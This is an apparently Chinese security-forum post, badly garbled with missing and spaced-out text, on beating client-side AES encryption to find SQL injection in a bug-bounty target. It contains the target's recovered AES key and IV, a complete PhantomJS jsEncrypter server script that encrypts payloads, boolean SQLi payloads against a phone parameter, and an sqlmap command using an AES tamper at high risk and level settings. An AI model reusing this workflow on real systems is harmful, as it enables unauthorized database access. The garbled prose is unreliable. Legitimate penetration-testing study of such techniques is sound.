[26530] 2020-11-24_吊打SRC的加密传输实现SQLi挖掘

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-11-24_吊打SRC的加密传输实现SQLi挖掘 S R C S Q L i 0 5   M 7 8   2 0 2 0 - 1 1 - 2 4                         使 使 使 使 0 x 0 1 : , , J S - - e v e n t   j s , , F o r g e t P w d . s e n d C o d e ( )   F o r g e t P w d s e n d C o d e ( ) J S
使 a e s _ e n c r y p t J S , J S a e s . j s   , , : d 4 9 d 6 9 1 f 2 3 4 4 4 1 a d d 2 f 6 1 0 d 5 d 1 1 f 6 a a d : b 8 8 3 b 5 e c 8 c a 2 5 9 6 9 2 8 6 9 a d a 4 b 7 2 d c 6 f 5 : z e r o p a d d i n g : C B C 线 A E S 0 x 0 2   便 , p h a n t o m j s p h a n t o m . j s h t t p s : / / p h a n t o m j s . o r g / d o w n l o a d . h t m l j s E n c r y p t e r _ b a s e . j s v a r   w e b s e r v e r   =   r e q u i r e ( ' w e b s e r v e r ' ) ; s e r v e r   =   w e b s e r v e r . c r e a t e ( ) ; v a r   h o s t   =   ' 1 2 7 . 0 . 0 . 1 ' ; v a r   p o r t   =   ' 1 6 6 4 ' ; / /   j s v a r   w a s S u c c e s s f u l   =   p h a n t o m . i n j e c t J s ( ' a e s . j s ' )   & &   p h a n t o m . i n j e c t J s ( ' p a d - z e r o p a d d i n g . j s ' ) ; / /   f u n c t i o n   j s _ e n c r y p t ( p a y l o a d ) { / * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * / v a r   A e s K e y   =   " d 4 9 d 6 9 1 f 2 3 4 4 4 1 a d d 2 f 6 1 0 d 5 d 1 1 f 6 a a d " ; v a r   C B C I V   =   " b 8 8 3 b 5 e c 8 c a 2 5 9 6 9 2 8 6 9 a d a 4 b 7 2 d c 6 f 5 " ;
  p h a n t o m j s . e x e   j s E n c r y p t e r _ b a s e . j s j s E n c r y p t e r h t t p s : / / g i t h u b . c o m / c 0 n y 1 / j s E n c r y p t e r / r e l e a s e s / t a g / 0 . 3 . 2 v a r   C B C O p t i o n s   =   {           i v :   C r y p t o J S . e n c . U t f 8 . p a r s e ( C B C I V ) ,           m o d e : C r y p t o J S . m o d e . C B C ,           p a d d i n g :   C r y p t o J S . p a d . Z e r o P a d d i n g } v a r   k e y   =   C r y p t o J S . e n c . U t f 8 . p a r s e ( A e s K e y ) ; v a r   s e c r e t D a t a   =   C r y p t o J S . e n c . U t f 8 . p a r s e ( p a y l o a d ) ; v a r   e n c r y p t e d   =   C r y p t o J S . A E S . e n c r y p t (               s e c r e t D a t a ,               k e y ,               C B C O p t i o n s           ) ; r e t u r n   e n c r y p t e d . t o S t r i n g ( ) ; / * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * / } i f ( w a s S u c c e s s f u l ) { c o n s o l e . l o g ( " [ * ]   l o a d   j s   s u c c e s s f u l " ) ; c o n s o l e . l o g ( " [ ! ]   ^ _ ^ " ) ; c o n s o l e . l o g ( " [ * ]   j s E n c r y p t e r J S   s t a r t ! " ) ; c o n s o l e . l o g ( " [ + ]   a d d r e s s :   h t t p : / / " + h o s t + " : " + p o r t ) ; } e l s e { c o n s o l e . l o g ( ' [ * ]   l o a d   j s   f a i l ! ' ) ; } v a r   s e r v i c e   =   s e r v e r . l i s t e n ( h o s t + ' : ' + p o r t , f u n c t i o n ( r e q u e s t ,   r e s p o n s e ) { t r y { i f ( r e q u e s t . m e t h o d   = =   ' P O S T ' ) { v a r   p a y l o a d   =   r e q u e s t . p o s t [ ' p a y l o a d ' ] ; v a r   e n c r y p t _ p a y l o a d   =   j s _ e n c r y p t ( p a y l o a d ) ; c o n s o l e . l o g ( ' [ + ]   '   +   p a y l o a d   +   ' : '   +   e n c r y p t _ p a y l o a d ) ; r e s p o n s e . s t a t u s C o d e   =   2 0 0 ; r e s p o n s e . w r i t e ( e n c r y p t _ p a y l o a d . t o S t r i n g ( ) ) ; r e s p o n s e . c l o s e ( ) ; } e l s e { r e s p o n s e . s t a t u s C o d e   =   2 0 0 ; r e s p o n s e . w r i t e ( " ^ _ ^ n r h e l l o   j s E n c r y p t e r ! " ) ; r e s p o n s e . c l o s e ( ) ; } } c a t c h ( e ) { c o n s o l e . l o g ( ' n - - - - - - - - - - - - - - - - - E r r o r   I n f o - - - - - - - - - - - - - - - - - - - - ' ) v a r   f u l l M e s s a g e   =   " M e s s a g e :   " + e . t o S t r i n g ( )   +   ' : ' +   e . l i n e ; f o r   ( v a r   p   i n   e )   { f u l l M e s s a g e   + =   " n "   +   p . t o U p p e r C a s e ( )   +   " :   "   +   e [ p ] ; } c o n s o l e . l o g ( f u l l M e s s a g e ) ; c o n s o l e . l o g ( ' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ' ) c o n s o l e . l o g ( ' [ * ]   p h a n t o m J S   e x i t ! ' ) p h a n t o m . e x i t ( ) ; } } ) ;
0 x 0 3     p a y l o a d   , p h o n e = 1 6 7 4 2 2 6 4 3 0 1 ' a n d   ' 1 ' = ' 0 ' & l a n g = z h p h o n e = 1 6 7 4 2 2 6 4 3 0 1 ' a n d   ' 1 ' = ' 1 ' & l a n g = z h s q l m a p   o r       s q l m a p   , s q l m a p s q l m a p , S o   t a m p e r A e s . p y A E S _ t a m p e r 0 x 0 4   , , S Q L " , " 线 线 p y t h o n   s q l m a p . p y   - r   1 . t x t   - - t a m p e r   a e s . p y , l o w e r c a s e . p y , e q u a l t o l i k e . p y   - - d b m s   m y s q l   - - p r o x y   h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0   - - f o r c e - s s l   - - r i s k   3   - - t e c h   B   - - s k i p - u r l e n c o d e   - - l e v e l   3
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则